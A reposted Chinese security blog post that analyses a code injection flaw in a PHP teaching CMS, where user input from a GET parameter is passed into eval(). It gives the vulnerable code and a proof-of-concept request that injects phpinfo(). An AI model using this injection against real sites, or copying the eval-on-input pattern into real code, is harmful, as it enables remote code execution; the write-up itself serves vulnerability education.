打开APP
userphoto
未登录

开通VIP,畅享免费电子书等14项超值服

开通VIP
【原创】某PHP培训CMS范例中的代码执行漏洞

【原创】某PHP培训CMS范例中的代码执行漏洞

2012 年 01 月 28 日 / 发表于 网络安全 / 尚无评论

  在VeryCD上下载量还挺高的,看说明是老师为了介绍MVC而做的一个例子,从开发的角度来说,本身还是不错的。不过为了图方便,忽视了一些东西,这里小文一篇,是为笔记。

  什么是MVC这里就不说了?为了实现单一入口,通常所有的动作(Control)都从一个文件出发。我们来看看他这里是怎么写的(位于根目录下的admin.php):

<?PHP
    require(‘init.php’);
    eval(‘$action=new ‘.ucfirst(isset($_GET["m"])?$_GET["m"]:"index")."Action();");
    $action->run();

?>

说明一下,这里包含的init.php文件的主要功能是利用PHP的魔术方法__autoload()来自动载入类文件。于是便有了后面的 $action = new SomeAction(); 这一句来实例化一个动作类。但是很遗憾的是,他为了图方便,而直接使用了eval函数。

“任何输入都是有害的”这句名言在此刻又闪耀出它的光芒~

new后面的字符是通过GET方式传入的,这里的数据输入就是由我控制的,于是可以这样请求

admin.php?m = xxxxx

然后发挥你邪恶的想象力,来做点邪恶的事情吧.

同时找到他存在一个叫UserModel的类.我们可以这样构造

admin.php?m = UserModel();phpinfo();//

于是我们eval中执行的语句变成了

$action=new UserModel();phpinfo();// Action();

代码执行如此产生了.修补方法下次再说..只是觉得培训机构这样出类似的教程教程序ctrl + c 或者 ctrl + v 是很伤的。 hv fun

本站仅提供存储服务,所有内容均由用户发布,如发现有害或侵权内容,请点击举报
打开APP,阅读全文并永久保存 查看更多类似文章
猜你喜欢
类似文章
【热】打开小程序,算一算2024你的财运
米拓建站系统1day审计与利用
XCTF的ics-07
EcShop后台添加菜单[步骤]
隐蔽超强PHP一句话木马
ubuntu安装php
PHP eval函数使用介绍
更多类似文章 >>
生活服务
热点新闻
分享 收藏 导长图 关注 下载文章
绑定账号成功
后续可登录账号畅享VIP特权!
如果VIP功能使用有故障,
可点击这里联系客服!

联系客服